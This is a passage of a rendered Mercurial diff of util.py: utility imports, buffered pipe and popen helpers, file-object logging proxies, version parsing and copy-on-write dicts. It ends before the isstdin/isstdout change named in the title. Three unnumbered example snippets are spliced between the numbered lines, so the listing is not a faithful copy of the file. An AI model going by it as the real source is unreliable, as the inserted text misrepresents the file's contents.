util: add public isstdin/isstdout() functions
Yuya Nishihara
r36811:eca1051e default
@@ -1,4055 +1,4061 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on the first write to stdout - if we replace a
91 91 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want
92 92 # line buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 def safehasattr(thing, attr):
180 180 return getattr(thing, attr, _notset) is not _notset
181 181
182 182 def _rapply(f, xs):
183 183 if xs is None:
184 184 # assume None means non-value of optional data
185 185 return xs
186 186 if isinstance(xs, (list, set, tuple)):
187 187 return type(xs)(_rapply(f, x) for x in xs)
188 188 if isinstance(xs, dict):
189 189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 190 return f(xs)
191 191
192 192 def rapply(f, xs):
193 193 """Apply function recursively to every item preserving the data structure
194 194
195 195 >>> def f(x):
196 196 ... return 'f(%s)' % x
197 197 >>> rapply(f, None) is None
198 198 True
199 199 >>> rapply(f, 'a')
200 200 'f(a)'
201 201 >>> rapply(f, {'a'}) == {'f(a)'}
202 202 True
203 203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 205
206 206 >>> xs = [object()]
207 207 >>> rapply(pycompat.identity, xs) is xs
208 208 True
209 209 """
210 210 if f is pycompat.identity:
211 211 # fast path mainly for py2
212 212 return xs
213 213 return _rapply(f, xs)
214 214
215 215 def bitsfrom(container):
216 216 bits = 0
217 217 for bit in container:
218 218 bits |= bit
219 219 return bits
220 220
221 221 # Python 2.6 still has deprecation warnings enabled by default. We do not
222 222 # want to display anything to ordinary users, so detect whether we are
223 223 # running the test suite and only emit Python deprecation warnings there.
224 224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 225 if _dowarn:
226 226 # explicitly unfilter our warning for python 2.7
227 227 #
228 228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 229 # However, a module name set through PYTHONWARNINGS is matched exactly, so
230 230 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
231 231 # makes the whole PYTHONWARNINGS approach useless for our use case.
232 232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 235 if _dowarn and pycompat.ispy3:
236 236 # silence warning emitted by passing user string to re.sub()
237 237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 238 r'mercurial')
239 239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 240 DeprecationWarning, r'mercurial')
241 241
242 242 def nouideprecwarn(msg, version, stacklevel=1):
243 243 """Issue a Python-native deprecation warning
244 244
245 245 This is a noop outside of tests; use 'ui.deprecwarn' when possible.
246 246 """
247 247 if _dowarn:
248 248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 249 " update your code.)") % version
250 250 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 251
252 252 DIGESTS = {
253 253 'md5': hashlib.md5,
254 254 'sha1': hashlib.sha1,
255 255 'sha512': hashlib.sha512,
256 256 }
257 257 # List of digest types from strongest to weakest
258 258 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 259
260 260 for k in DIGESTS_BY_STRENGTH:
261 261 assert k in DIGESTS
262 262
263 263 class digester(object):
264 264 """helper to compute digests.
265 265
266 266 This helper can be used to compute one or more digests given their name.
267 267
268 268 >>> d = digester([b'md5', b'sha1'])
269 269 >>> d.update(b'foo')
270 270 >>> [k for k in sorted(d)]
271 271 ['md5', 'sha1']
272 272 >>> d[b'md5']
273 273 'acbd18db4cc2f85cedef654fccc4a4d8'
274 274 >>> d[b'sha1']
275 275 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 276 >>> digester.preferred([b'md5', b'sha1'])
277 277 'sha1'
278 278 """
279 279
280 280 def __init__(self, digests, s=''):
281 281 self._hashes = {}
282 282 for k in digests:
283 283 if k not in DIGESTS:
284 284 raise Abort(_('unknown digest type: %s') % k)
285 285 self._hashes[k] = DIGESTS[k]()
286 286 if s:
287 287 self.update(s)
288 288
289 289 def update(self, data):
290 290 for h in self._hashes.values():
291 291 h.update(data)
292 292
293 293 def __getitem__(self, key):
294 294 if key not in DIGESTS:
295 295 raise Abort(_('unknown digest type: %s') % key)
296 296 return nodemod.hex(self._hashes[key].digest())
297 297
298 298 def __iter__(self):
299 299 return iter(self._hashes)
300 300
301 301 @staticmethod
302 302 def preferred(supported):
303 303 """returns the strongest digest type in both supported and DIGESTS."""
304 304
305 305 for k in DIGESTS_BY_STRENGTH:
306 306 if k in supported:
307 307 return k
308 308 return None
309 309
310 310 class digestchecker(object):
311 311 """file handle wrapper that additionally checks content against a given
312 312 size and digests.
313 313
314 314 d = digestchecker(fh, size, {'md5': '...'})
315 315
316 316 When multiple digests are given, all of them are validated.
317 317 """
318 318
319 319 def __init__(self, fh, size, digests):
320 320 self._fh = fh
321 321 self._size = size
322 322 self._got = 0
323 323 self._digests = dict(digests)
324 324 self._digester = digester(self._digests.keys())
325 325
326 326 def read(self, length=-1):
327 327 content = self._fh.read(length)
328 328 self._digester.update(content)
329 329 self._got += len(content)
330 330 return content
331 331
332 332 def validate(self):
333 333 if self._size != self._got:
334 334 raise Abort(_('size mismatch: expected %d, got %d') %
335 335 (self._size, self._got))
336 336 for k, v in self._digests.items():
337 337 if v != self._digester[k]:
338 338 # i18n: first parameter is a digest name
339 339 raise Abort(_('%s mismatch: expected %s, got %s') %
340 340 (k, v, self._digester[k]))
341 341
342 342 try:
343 343 buffer = buffer
344 344 except NameError:
345 345 def buffer(sliceable, offset=0, length=None):
346 346 if length is not None:
347 347 return memoryview(sliceable)[offset:offset + length]
348 348 return memoryview(sliceable)[offset:]
349 349
350 350 closefds = pycompat.isposix
351 351
352 352 _chunksize = 4096
353 353
354 354 class bufferedinputpipe(object):
355 355 """a manually buffered input pipe
356 356
357 357 Python will not let us use buffered IO and lazy reading with 'polling' at
358 358 the same time: we cannot probe the buffer state, and select will not detect
359 359 that data is ready to read if it is already buffered.
360 360
361 361 This class lets us work around that by implementing its own buffering
362 362 (allowing efficient readline) while offering a way to know if the buffer is
363 363 empty from the outside (allowing the buffer to cooperate with polling).
364 364
365 365 This class lives in the 'util' module because it makes use of the 'os'
366 366 module from the python stdlib.
367 367 """
368 368 def __new__(cls, fh):
369 369 # If we receive a fileobjectproxy, we need to use a variation of this
370 370 # class that notifies observers about activity.
371 371 if isinstance(fh, fileobjectproxy):
372 372 cls = observedbufferedinputpipe
373 373
374 374 return super(bufferedinputpipe, cls).__new__(cls)
375 375
376 376 def __init__(self, input):
377 377 self._input = input
378 378 self._buffer = []
379 379 self._eof = False
380 380 self._lenbuf = 0
381 381
382 382 @property
383 383 def hasbuffer(self):
384 384 """True if any data is currently buffered
385 385
386 386 This is used externally as a pre-step for polling IO. If there is
387 387 already buffered data, no polling should be set up."""
388 388 return bool(self._buffer)
389 389
390 390 @property
391 391 def closed(self):
392 392 return self._input.closed
393 393
394 394 def fileno(self):
395 395 return self._input.fileno()
396 396
397 397 def close(self):
398 398 return self._input.close()
399 399
400 400 def read(self, size):
401 401 while (not self._eof) and (self._lenbuf < size):
402 402 self._fillbuffer()
403 403 return self._frombuffer(size)
404 404
405 405 def readline(self, *args, **kwargs):
406 406 if 1 < len(self._buffer):
407 407 # this should not happen because both read and readline end with a
408 408 # _frombuffer call that collapses it.
409 409 self._buffer = [''.join(self._buffer)]
410 410 self._lenbuf = len(self._buffer[0])
411 411 lfi = -1
412 412 if self._buffer:
413 413 lfi = self._buffer[-1].find('\n')
414 414 while (not self._eof) and lfi < 0:
415 415 self._fillbuffer()
416 416 if self._buffer:
417 417 lfi = self._buffer[-1].find('\n')
418 418 size = lfi + 1
419 419 if lfi < 0: # end of file
420 420 size = self._lenbuf
421 421 elif 1 < len(self._buffer):
422 422 # we need to take previous chunks into account
423 423 size += self._lenbuf - len(self._buffer[-1])
424 424 return self._frombuffer(size)
425 425
426 426 def _frombuffer(self, size):
427 427 """return at most 'size' data from the buffer
428 428
429 429 The data are removed from the buffer."""
430 430 if size == 0 or not self._buffer:
431 431 return ''
432 432 buf = self._buffer[0]
433 433 if 1 < len(self._buffer):
434 434 buf = ''.join(self._buffer)
435 435
436 436 data = buf[:size]
437 437 buf = buf[len(data):]
438 438 if buf:
439 439 self._buffer = [buf]
440 440 self._lenbuf = len(buf)
441 441 else:
442 442 self._buffer = []
443 443 self._lenbuf = 0
444 444 return data
445 445
446 446 def _fillbuffer(self):
447 447 """read data to the buffer"""
448 448 data = os.read(self._input.fileno(), _chunksize)
449 449 if not data:
450 450 self._eof = True
451 451 else:
452 452 self._lenbuf += len(data)
453 453 self._buffer.append(data)
454 454
455 455 return data
456 456
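
A minimal sketch of how hasbuffer cooperates with polling, under Python 2 (the pipe payload is illustrative): consult hasbuffer first, because select() cannot see data that bufferedinputpipe has already read into its private buffer.

    import os
    import select

    rfd, wfd = os.pipe()
    os.write(wfd, 'one\ntwo\n')
    os.close(wfd)

    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    while True:
        # poll only when the private buffer is empty
        if not pipe.hasbuffer:
            select.select([pipe], [], [])
        line = pipe.readline()
        if not line:          # '' signals EOF
            break
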
457 457 def mmapread(fp):
458 458 try:
459 459 fd = getattr(fp, 'fileno', lambda: fp)()
460 460 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 461 except ValueError:
462 462 # Empty files cannot be mmapped, but mmapread should still work. Check
463 463 # if the file is empty, and if so, return an empty buffer.
464 464 if os.fstat(fd).st_size == 0:
465 465 return ''
466 466 raise
467 467
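
For example (the path is illustrative; any readable file works):

    # mmapread() accepts a file object or a raw descriptor and returns a
    # bytes-like view of the whole file; empty files yield ''
    fp = open('util.py', 'rb')
    data = mmapread(fp)
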
468 468 def popen2(cmd, env=None, newlines=False):
469 469 # Setting bufsize to -1 lets the system decide the buffer size.
470 470 # The default for bufsize is 0, meaning unbuffered. This leads to
471 471 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 472 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 473 close_fds=closefds,
474 474 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 475 universal_newlines=newlines,
476 476 env=env)
477 477 return p.stdin, p.stdout
478 478
479 479 def popen3(cmd, env=None, newlines=False):
480 480 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 481 return stdin, stdout, stderr
482 482
483 483 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 484 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 485 close_fds=closefds,
486 486 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 487 stderr=subprocess.PIPE,
488 488 universal_newlines=newlines,
489 489 env=env)
490 490 return p.stdin, p.stdout, p.stderr, p
491 491
492 492 class fileobjectproxy(object):
493 493 """A proxy around file objects that tells a watcher when events occur.
494 494
495 495 This type is intended to only be used for testing purposes. Think hard
496 496 before using it in important code.
497 497 """
498 498 __slots__ = (
499 499 r'_orig',
500 500 r'_observer',
501 501 )
502 502
503 503 def __init__(self, fh, observer):
504 504 object.__setattr__(self, r'_orig', fh)
505 505 object.__setattr__(self, r'_observer', observer)
506 506
507 507 def __getattribute__(self, name):
508 508 ours = {
509 509 r'_observer',
510 510
511 511 # IOBase
512 512 r'close',
513 513 # closed is a property
514 514 r'fileno',
515 515 r'flush',
516 516 r'isatty',
517 517 r'readable',
518 518 r'readline',
519 519 r'readlines',
520 520 r'seek',
521 521 r'seekable',
522 522 r'tell',
523 523 r'truncate',
524 524 r'writable',
525 525 r'writelines',
526 526 # RawIOBase
527 527 r'read',
528 528 r'readall',
529 529 r'readinto',
530 530 r'write',
531 531 # BufferedIOBase
532 532 # raw is a property
533 533 r'detach',
534 534 # read defined above
535 535 r'read1',
536 536 # readinto defined above
537 537 # write defined above
538 538 }
539 539
540 540 # We only observe some methods.
541 541 if name in ours:
542 542 return object.__getattribute__(self, name)
543 543
544 544 return getattr(object.__getattribute__(self, r'_orig'), name)
545 545
546 546 def __delattr__(self, name):
547 547 return delattr(object.__getattribute__(self, r'_orig'), name)
548 548
549 549 def __setattr__(self, name, value):
550 550 return setattr(object.__getattribute__(self, r'_orig'), name, value)
551 551
552 552 def __iter__(self):
553 553 return object.__getattribute__(self, r'_orig').__iter__()
554 554
555 555 def _observedcall(self, name, *args, **kwargs):
556 556 # Call the original object.
557 557 orig = object.__getattribute__(self, r'_orig')
558 558 res = getattr(orig, name)(*args, **kwargs)
559 559
560 560 # Call a method on the observer of the same name with arguments
561 561 # so it can react, log, etc.
562 562 observer = object.__getattribute__(self, r'_observer')
563 563 fn = getattr(observer, name, None)
564 564 if fn:
565 565 fn(res, *args, **kwargs)
566 566
567 567 return res
568 568
569 569 def close(self, *args, **kwargs):
570 570 return object.__getattribute__(self, r'_observedcall')(
571 571 r'close', *args, **kwargs)
572 572
573 573 def fileno(self, *args, **kwargs):
574 574 return object.__getattribute__(self, r'_observedcall')(
575 575 r'fileno', *args, **kwargs)
576 576
577 577 def flush(self, *args, **kwargs):
578 578 return object.__getattribute__(self, r'_observedcall')(
579 579 r'flush', *args, **kwargs)
580 580
581 581 def isatty(self, *args, **kwargs):
582 582 return object.__getattribute__(self, r'_observedcall')(
583 583 r'isatty', *args, **kwargs)
584 584
585 585 def readable(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'readable', *args, **kwargs)
588 588
589 589 def readline(self, *args, **kwargs):
590 590 return object.__getattribute__(self, r'_observedcall')(
591 591 r'readline', *args, **kwargs)
592 592
593 593 def readlines(self, *args, **kwargs):
594 594 return object.__getattribute__(self, r'_observedcall')(
595 595 r'readlines', *args, **kwargs)
596 596
597 597 def seek(self, *args, **kwargs):
598 598 return object.__getattribute__(self, r'_observedcall')(
599 599 r'seek', *args, **kwargs)
600 600
601 601 def seekable(self, *args, **kwargs):
602 602 return object.__getattribute__(self, r'_observedcall')(
603 603 r'seekable', *args, **kwargs)
604 604
605 605 def tell(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'tell', *args, **kwargs)
608 608
609 609 def truncate(self, *args, **kwargs):
610 610 return object.__getattribute__(self, r'_observedcall')(
611 611 r'truncate', *args, **kwargs)
612 612
613 613 def writable(self, *args, **kwargs):
614 614 return object.__getattribute__(self, r'_observedcall')(
615 615 r'writable', *args, **kwargs)
616 616
617 617 def writelines(self, *args, **kwargs):
618 618 return object.__getattribute__(self, r'_observedcall')(
619 619 r'writelines', *args, **kwargs)
620 620
621 621 def read(self, *args, **kwargs):
622 622 return object.__getattribute__(self, r'_observedcall')(
623 623 r'read', *args, **kwargs)
624 624
625 625 def readall(self, *args, **kwargs):
626 626 return object.__getattribute__(self, r'_observedcall')(
627 627 r'readall', *args, **kwargs)
628 628
629 629 def readinto(self, *args, **kwargs):
630 630 return object.__getattribute__(self, r'_observedcall')(
631 631 r'readinto', *args, **kwargs)
632 632
633 633 def write(self, *args, **kwargs):
634 634 return object.__getattribute__(self, r'_observedcall')(
635 635 r'write', *args, **kwargs)
636 636
637 637 def detach(self, *args, **kwargs):
638 638 return object.__getattribute__(self, r'_observedcall')(
639 639 r'detach', *args, **kwargs)
640 640
641 641 def read1(self, *args, **kwargs):
642 642 return object.__getattribute__(self, r'_observedcall')(
643 643 r'read1', *args, **kwargs)
644 644
645 645 class observedbufferedinputpipe(bufferedinputpipe):
646 646 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
647 647
648 648 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
649 649 bypass ``fileobjectproxy``. Because of this, we need to make
650 650 ``bufferedinputpipe`` aware of these operations.
651 651
652 652 This variation of ``bufferedinputpipe`` can notify observers about
653 653 ``os.read()`` events. It also re-publishes other events, such as
654 654 ``read()`` and ``readline()``.
655 655 """
656 656 def _fillbuffer(self):
657 657 res = super(observedbufferedinputpipe, self)._fillbuffer()
658 658
659 659 fn = getattr(self._input._observer, r'osread', None)
660 660 if fn:
661 661 fn(res, _chunksize)
662 662
663 663 return res
664 664
665 665 # We use different observer methods because the operation isn't
666 666 # performed on the actual file object but on us.
667 667 def read(self, size):
668 668 res = super(observedbufferedinputpipe, self).read(size)
669 669
670 670 fn = getattr(self._input._observer, r'bufferedread', None)
671 671 if fn:
672 672 fn(res, size)
673 673
674 674 return res
675 675
676 676 def readline(self, *args, **kwargs):
677 677 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
678 678
679 679 fn = getattr(self._input._observer, r'bufferedreadline', None)
680 680 if fn:
681 681 fn(res)
682 682
683 683 return res
684 684
685 685 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
686 686 DATA_ESCAPE_MAP.update({
687 687 b'\\': b'\\\\',
688 688 b'\r': br'\r',
689 689 b'\n': br'\n',
690 690 })
691 691 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
692 692
693 693 def escapedata(s):
694 694 if isinstance(s, bytearray):
695 695 s = bytes(s)
696 696
697 697 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
698 698
699 699 class fileobjectobserver(object):
700 700 """Logs file object activity."""
701 701 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
702 702 self.fh = fh
703 703 self.name = name
704 704 self.logdata = logdata
705 705 self.reads = reads
706 706 self.writes = writes
707 707
708 708 def _writedata(self, data):
709 709 if not self.logdata:
710 710 self.fh.write('\n')
711 711 return
712 712
713 713 # Simple case writes all data on a single line.
714 714 if b'\n' not in data:
715 715 self.fh.write(': %s\n' % escapedata(data))
716 716 return
717 717
718 718 # Data with newlines is written to multiple lines.
719 719 self.fh.write(':\n')
720 720 lines = data.splitlines(True)
721 721 for line in lines:
722 722 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
723 723
724 724 def read(self, res, size=-1):
725 725 if not self.reads:
726 726 return
727 727 # Python 3 can return None from reads at EOF instead of empty strings.
728 728 if res is None:
729 729 res = ''
730 730
731 731 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
732 732 self._writedata(res)
733 733
734 734 def readline(self, res, limit=-1):
735 735 if not self.reads:
736 736 return
737 737
738 738 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
739 739 self._writedata(res)
740 740
741 741 def readinto(self, res, dest):
742 742 if not self.reads:
743 743 return
744 744
745 745 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
746 746 res))
747 747 data = dest[0:res] if res is not None else b''
748 748 self._writedata(data)
749 749
750 750 def write(self, res, data):
751 751 if not self.writes:
752 752 return
753 753
754 754 # Python 2 returns None from some write() calls. Python 3 (reasonably)
755 755 # returns the integer bytes written.
756 756 if res is None and data:
757 757 res = len(data)
758 758
759 759 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
760 760 self._writedata(data)
761 761
762 762 def flush(self, res):
763 763 if not self.writes:
764 764 return
765 765
766 766 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
767 767
768 768 # For observedbufferedinputpipe.
769 769 def bufferedread(self, res, size):
770 770 self.fh.write('%s> bufferedread(%d) -> %d' % (
771 771 self.name, size, len(res)))
772 772 self._writedata(res)
773 773
774 774 def bufferedreadline(self, res):
775 775 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
776 776 self._writedata(res)
777 777
778 778 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
779 779 logdata=False):
780 780 """Turn a file object into a logging file object."""
781 781
782 782 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
783 783 logdata=logdata)
784 784 return fileobjectproxy(fh, observer)
785 785
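
A small sketch of the proxy in action using in-memory file objects (the observer name 'test' is arbitrary):

    log = stringio()
    fh = stringio('hello\nworld\n')
    proxy = makeloggingfileobject(log, fh, 'test', logdata=True)
    proxy.readline()
    # log now holds something like 'test> readline() -> 6' followed by
    # the escaped data on continuation lines
    print(log.getvalue())
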
786 786 def version():
787 787 """Return version information if available."""
788 788 try:
789 789 from . import __version__
790 790 return __version__.version
791 791 except ImportError:
792 792 return 'unknown'
793 793
794 794 def versiontuple(v=None, n=4):
795 795 """Parses a Mercurial version string into an N-tuple.
796 796
797 797 The version string to be parsed is specified with the ``v`` argument.
798 798 If it isn't defined, the current Mercurial version string will be parsed.
799 799
800 800 ``n`` can be 2, 3, or 4. Here is how some version strings map to
801 801 returned values:
802 802
803 803 >>> v = b'3.6.1+190-df9b73d2d444'
804 804 >>> versiontuple(v, 2)
805 805 (3, 6)
806 806 >>> versiontuple(v, 3)
807 807 (3, 6, 1)
808 808 >>> versiontuple(v, 4)
809 809 (3, 6, 1, '190-df9b73d2d444')
810 810
811 811 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
812 812 (3, 6, 1, '190-df9b73d2d444+20151118')
813 813
814 814 >>> v = b'3.6'
815 815 >>> versiontuple(v, 2)
816 816 (3, 6)
817 817 >>> versiontuple(v, 3)
818 818 (3, 6, None)
819 819 >>> versiontuple(v, 4)
820 820 (3, 6, None, None)
821 821
822 822 >>> v = b'3.9-rc'
823 823 >>> versiontuple(v, 2)
824 824 (3, 9)
825 825 >>> versiontuple(v, 3)
826 826 (3, 9, None)
827 827 >>> versiontuple(v, 4)
828 828 (3, 9, None, 'rc')
829 829
830 830 >>> v = b'3.9-rc+2-02a8fea4289b'
831 831 >>> versiontuple(v, 2)
832 832 (3, 9)
833 833 >>> versiontuple(v, 3)
834 834 (3, 9, None)
835 835 >>> versiontuple(v, 4)
836 836 (3, 9, None, 'rc+2-02a8fea4289b')
837 837 """
838 838 if not v:
839 839 v = version()
840 840 parts = remod.split('[\+-]', v, 1)
841 841 if len(parts) == 1:
842 842 vparts, extra = parts[0], None
843 843 else:
844 844 vparts, extra = parts
845 845
846 846 vints = []
847 847 for i in vparts.split('.'):
848 848 try:
849 849 vints.append(int(i))
850 850 except ValueError:
851 851 break
852 852 # (3, 6) -> (3, 6, None)
853 853 while len(vints) < 3:
854 854 vints.append(None)
855 855
856 856 if n == 2:
857 857 return (vints[0], vints[1])
858 858 if n == 3:
859 859 return (vints[0], vints[1], vints[2])
860 860 if n == 4:
861 861 return (vints[0], vints[1], vints[2], extra)
862 862
863 863 def cachefunc(func):
864 864 '''cache the result of function calls'''
865 865 # XXX doesn't handle keyword args
866 866 if func.__code__.co_argcount == 0:
867 867 cache = []
868 868 def f():
869 869 if len(cache) == 0:
870 870 cache.append(func())
871 871 return cache[0]
872 872 return f
873 873 cache = {}
874 874 if func.__code__.co_argcount == 1:
875 875 # we gain a small amount of time because
876 876 # we don't need to pack/unpack the list
877 877 def f(arg):
878 878 if arg not in cache:
879 879 cache[arg] = func(arg)
880 880 return cache[arg]
881 881 else:
882 882 def f(*args):
883 883 if args not in cache:
884 884 cache[args] = func(*args)
885 885 return cache[args]
886 886
887 887 return f
888 888
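
For example, the one-argument fast path memoizes per distinct argument:

    calls = []
    def square(x):
        calls.append(x)
        return x * x

    csquare = cachefunc(square)
    assert csquare(3) == 9
    assert csquare(3) == 9    # second call is served from the cache
    assert calls == [3]       # the wrapped function ran only once
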
889 889 class cow(object):
890 890 """helper class to make copy-on-write easier
891 891
892 892 Call preparewrite before doing any writes.
893 893 """
894 894
895 895 def preparewrite(self):
896 896 """call this before writes, return self or a copied new object"""
897 897 if getattr(self, '_copied', 0):
898 898 self._copied -= 1
899 899 return self.__class__(self)
900 900 return self
901 901
902 902 def copy(self):
903 903 """always do a cheap copy"""
904 904 self._copied = getattr(self, '_copied', 0) + 1
905 905 return self
906 906
907 907 class sortdict(collections.OrderedDict):
908 908 '''a simple sorted dictionary
909 909
910 910 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
911 911 >>> d2 = d1.copy()
912 912 >>> d2
913 913 sortdict([('a', 0), ('b', 1)])
914 914 >>> d2.update([(b'a', 2)])
915 915 >>> list(d2.keys()) # should still be in last-set order
916 916 ['b', 'a']
917 917 '''
918 918
919 919 def __setitem__(self, key, value):
920 920 if key in self:
921 921 del self[key]
922 922 super(sortdict, self).__setitem__(key, value)
923 923
924 924 if pycompat.ispypy:
925 925 # __setitem__() isn't called as of PyPy 5.8.0
926 926 def update(self, src):
927 927 if isinstance(src, dict):
928 928 src = src.iteritems()
929 929 for k, v in src:
930 930 self[k] = v
931 931
932 932 class cowdict(cow, dict):
933 933 """copy-on-write dict
934 934
935 935 Be sure to call d = d.preparewrite() before writing to d.
936 936
937 937 >>> a = cowdict()
938 938 >>> a is a.preparewrite()
939 939 True
940 940 >>> b = a.copy()
941 941 >>> b is a
942 942 True
943 943 >>> c = b.copy()
944 944 >>> c is a
945 945 True
946 946 >>> a = a.preparewrite()
947 947 >>> b is a
948 948 False
949 949 >>> a is a.preparewrite()
950 950 True
951 951 >>> c = c.preparewrite()
